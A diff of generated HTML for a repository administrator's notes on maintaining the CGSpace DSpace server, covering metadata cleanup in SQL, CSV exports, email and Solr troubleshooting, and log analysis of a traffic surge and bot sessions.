<pre><code>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
<pre tabindex="0"><code>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><ul>
<li>Carlos from LandPortal asked if I could export CGSpace in a machine-readable format so I think I&rsquo;ll try to do a CSV
<ul>
@ -1247,7 +1247,7 @@ COPY 65752
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id != 28 GROUP BY text_lang;
<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id != 28 GROUP BY text_lang;
text_lang | count
-----------+---------
| 358647
@ -1262,11 +1262,11 @@ COPY 65752
spa | 2
| 1074345
(11 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 360295
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 1074345
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 14
</code></pre><ul>
<li>Then I exported the whole repository as CSV (see the sketch below), imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos</li>
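<ul>
<li>The repository export itself is one command with the DSpace CLI (a sketch; the output path is arbitrary, and the column cleanup happened afterwards in OpenRefine):</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -a -f /tmp/cgspace-metadata.csv
$ zip /tmp/cgspace-metadata.csv.zip /tmp/cgspace-metadata.csv
</code></pre>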
@ -1299,15 +1299,15 @@ UPDATE 14
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -48,7 +48,7 @@ DELETE 1
But after this I tried to delete the item from the XMLUI and it is still present&hellip;
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -78,12 +78,12 @@ But after this I tried to delete the item from the XMLUI and it is still present
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -129,7 +129,7 @@ But after this I tried to delete the item from the XMLUI and it is still present
<p class="blog-post-meta">
<time datetime="2019-05-01T07:37:43+03:00">Wed May 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -145,7 +145,7 @@ But after this I tried to delete the item from the XMLUI and it is still present
</li>
<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li>
</ul>
<pre><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
DELETE 1
</code></pre><ul>
<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li>
@ -158,7 +158,7 @@ DELETE 1
</ul>
</li>
</ul>
<pre><code>dspace=# DELETE FROM metadatavalue WHERE resource_id=74648;
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_id=74648;
dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
dspace=# DELETE FROM item WHERE item_id=74648;
</code></pre><ul>
@ -168,12 +168,12 @@ dspace=# DELETE FROM item WHERE item_id=74648;
</ul>
</li>
</ul>
<pre><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401 Unauthorized
</code></pre><ul>
<li>The DSpace log shows the item ID (because I modified the error text):</li>
</ul>
<pre><code>2019-05-01 11:41:11,069 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=77708)!
<pre tabindex="0"><code>2019-05-01 11:41:11,069 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=77708)!
</code></pre><ul>
<li>If I delete that one I get another, making the list of item IDs so far:
<ul>
@ -202,7 +202,7 @@ curl: (22) The requested URL returned error: 401 Unauthorized
</ul>
</li>
</ul>
<pre><code>https://cgspace.cgiar.org/rest/collections/1179/items?limit=812&amp;expand=metadata
<pre tabindex="0"><code>https://cgspace.cgiar.org/rest/collections/1179/items?limit=812&amp;expand=metadata
</code></pre><h2 id="2019-05-03">2019-05-03</h2>
<ul>
<li>A user from CIAT emailed to say that CGSpace submission emails have not been working the last few weeks
@ -211,7 +211,7 @@ curl: (22) The requested URL returned error: 401 Unauthorized
</ul>
</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: woohoo@cgiar.org
@ -255,11 +255,11 @@ Please see the DSpace documentation for assistance.
</ul>
</li>
</ul>
<pre><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>As well as this error in the logs:</li>
</ul>
<pre><code>Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
<pre tabindex="0"><code>Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
</code></pre><ul>
<li>Strangely enough, I <em>do</em> see the statistics-2018, statistics-2017, etc cores in the Admin UI&hellip;</li>
<li>I restarted Tomcat a few times (and even deleted all the Solr write locks) and at least five times there were issues loading one statistics core, causing the Atmire stats to be incomplete
@ -282,52 +282,52 @@ Please see the DSpace documentation for assistance.
<ul>
<li>The number of unique sessions today is <em>ridiculously</em> high compared to the last few days considering it&rsquo;s only 12:30PM right now:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-06 | sort | uniq | wc -l
101108
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-05 | sort | uniq | wc -l
14618
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-04 | sort | uniq | wc -l
14946
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-03 | sort | uniq | wc -l
6410
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-02 | sort | uniq | wc -l
7758
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-01 | sort | uniq | wc -l
20528
</code></pre><ul>
<li>The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
7127
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;05/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1231
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;04/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1255
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;03/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1736
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;02/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1573
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E &#39;01/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1410
</code></pre><ul>
<li>Just this morning between the hours of 2 and 6 the number of unique sessions was <em>very</em> high compared to previous mornings:</li>
</ul>
<pre><code>$ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;2019-05-06 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
83650
$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;2019-05-05 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2547
$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;2019-05-04 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2574
$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;2019-05-03 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2911
$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;2019-05-02 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2704
$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;2019-05-01 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
3699
</code></pre><ul>
<li>Most of the requests were GETs:</li>
</ul>
<pre><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot;(GET|HEAD|POST|PUT)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34;(GET|HEAD|POST|PUT)&#34; | sort | uniq -c | sort -n
1 PUT
98 POST
2845 HEAD
@ -336,19 +336,19 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<li>I&rsquo;m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?</li>
<li>Looking again, I see 84,000 requests to <code>/handle</code> this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in <code>access.log</code>):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E &quot; /handle/[0-9]+/[0-9]+&quot;
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -c -o -E &#34; /handle/[0-9]+/[0-9]+&#34;
84350
</code></pre><ul>
<li>But it would be difficult to find a pattern for those requests because they cover 78,000 <em>unique</em> Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+ HTTP&quot; | sort | uniq | wc -l
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+ HTTP&#34; | sort | uniq | wc -l
78104
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+/(discover|browse)&quot; | wc -l
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+/(discover|browse)&#34; | wc -l
2492
</code></pre><ul>
<li>In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:</li>
</ul>
<pre><code># grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk &#39;{print $1}&#39; | sort | uniq -c
3 2a01:7e00::f03c:91ff:fe0a:d645
113 63.32.242.35
</code></pre><ul>
@ -363,28 +363,28 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<ul>
<li>The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;06/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
13969
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;05/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
5936
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;04/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
6229
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;03/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
8051
</code></pre><ul>
<li>Total number of sessions yesterday was <em>much</em> higher compared to days last week:</li>
</ul>
<pre><code>$ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
144160
$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
57269
$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
58648
$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
27883
$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
26996
$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
61866
</code></pre><ul>
<li>The usage statistics seem to agree that yesterday was crazy:</li>
@ -407,7 +407,7 @@ $ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq |
</ul>
</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: wooooo@cgiar.org
@ -423,9 +423,9 @@ Please see the DSpace documentation for assistance.
<li>Help Moayad with certbot-auto for Let&rsquo;s Encrypt scripts on the new AReS server (linode20)</li>
<li>Normalize all <code>text_lang</code> values for metadata on CGSpace and DSpace Test (as I had tested last month):</li>
</ul>
<pre><code>UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
</code></pre><ul>
<li>Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
<ul>
@ -454,7 +454,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
</li>
<li>All of the IPs from these networks are using generic user agents like this one, but there are MANY more, and they change many times:</li>
</ul>
<pre><code>&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&#34;
</code></pre><ul>
<li>I found a <a href="https://www.qurium.org/alerts/azerbaijan/azerbaijan-and-the-region40-ddos-service/">blog post from 2018 detailing an attack from a DDoS service</a> that matches our pattern exactly</li>
<li>They specifically mention:</li>
@ -473,7 +473,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
<ul>
<li>I see that the Unpaywall bot is responsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):</li>
</ul>
<pre><code>$ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E &#39;ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)&#39; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2206
</code></pre><ul>
<li>I added &ldquo;Unpaywall&rdquo; to the list of bots in the Tomcat Crawler Session Manager Valve</li>
@ -505,7 +505,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
<ul>
<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-05-16-investors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-05-16-investors.csv WITH CSV HEADER;
COPY 995
</code></pre><ul>
<li>Fork the <a href="https://github.com/icarda-git/AReS">ICARDA AReS v1 repository</a> to <a href="https://github.com/ilri/AReS">ILRI&rsquo;s GitHub</a> and give access to CodeObia guys
@ -519,20 +519,20 @@ COPY 995
<li>Peter sent me a bunch of fixes for investors from yesterday</li>
<li>I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I started a full Discovery re-indexing:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically</li>
<li>Instead, I exported a new list and asked Peter to look at it again</li>
<li>Apply Peter&rsquo;s new corrections on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
